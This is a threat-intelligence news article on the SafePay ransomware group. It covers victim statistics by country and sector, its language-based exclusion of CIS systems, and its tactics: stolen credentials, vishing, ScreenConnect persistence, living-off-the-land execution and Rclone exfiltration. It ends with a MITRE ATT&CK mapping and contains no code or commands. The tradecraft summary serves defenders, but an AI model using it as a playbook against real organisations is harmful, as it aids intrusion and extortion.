SafePay Ransomware Targets 260+ Victims Across Various Countries

A sophisticated ransomware group known as SafePay has emerged as one of the most aggressive threat actors in the cybersecurity landscape, claiming responsibility for over 265 victims across multiple countries since its initial appearance in September 2024.

Unlike traditional ransomware operations that rely on affiliate networks, SafePay operates as a closed group, conducting both the development and deployment of attacks internally while employing double extortion tactics that combine file encryption with data theft and leak threats.

US and Germany Bear Brunt of Attacks

SafePay’s targeting strategy reveals a clear focus on developed economies, with the United States suffering the heaviest impact at 103 confirmed victims, nearly 40% of all known cases.

Germany follows as the second most targeted nation with 47 cases, while attacks have spread across the United Kingdom, Australia, Canada, and various countries in Latin America and Asia.

The ransomware demonstrates geographic discrimination through built-in language checks that cause the malware to terminate if it detects system languages including Russian, Ukrainian, Armenian, Belarusian, Georgian, Kazakh, or Azerbaijani, effectively avoiding CIS region targets.

The group’s victim profile spans diverse industries, with manufacturing, technology, education, business services, and healthcare sectors bearing the brunt of attacks.

This broad targeting approach indicates SafePay’s strategy of focusing on organizations likely to pay ransoms to avoid operational disruption.

Sophisticated Multi-Vector Attack Chain

SafePay employs advanced techniques beginning with credential theft through dark web markets or infostealer infections, followed by exploitation of exposed VPN gateways and RDP endpoints.

The group has successfully bypassed multi-factor authentication in multiple incidents due to misconfigured firewalls and weak password policies.

Their attack methodology includes sophisticated social engineering campaigns involving email flooding combined with vishing calls where attackers impersonate IT support to convince targets to execute malicious payloads.

Once inside networks, SafePay establishes persistence using legitimate remote access tools like ConnectWise ScreenConnect and custom malware such as QDoor.

The group employs living-off-the-land techniques, utilizing built-in Windows tools like regsvr32 and cmd.exe to execute code while evading detection.

Before encryption, attackers spend days performing data exfiltration using tools like FileZilla and Rclone, transferring hundreds of gigabytes to attacker-controlled servers for subsequent extortion leverage.

The ransomware appends the .safepay extension to encrypted files and leaves ransom notes named readme_safepay.txt, directing victims to dark web portals hosted on The Open Network (TON) for payment negotiations.

Indicators of Compromise (IoCs):

MITRE ATT&CK

Tactics	Technique ID	Technique Name
Initial Access	T1078	Valid Accounts
Execution	T1059	Command and Scripting Interpreter
	T1059.001	PowerShell
	T1059.003	Windows Command Shell
	T1202	System Binary Proxy Execution
Privilege Escalation	T1548.002	Abuse Elevation Control Mechanism: Bypass UAC
Defense Evasion	T1070.004	File Removal
	T1562.001	Impair Defenses: Disable or Modify Tools
Credential Access	T1003	OS Credential Dumping
Discovery	T1135	Network Share Discovery
	T1482	Domain Trust Discovery
Lateral Movement	T1021	Remote Services
Collection	T1560.001	Archive Collected Data: Archive via Utility
Exfiltration	T1048	Exfiltration Over Alternative Protocol
	T1048.003	Exfiltration Over Web Service
Impact	T1486	Data Encrypted for Impact
	T1490	Inhibit System Recovery

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates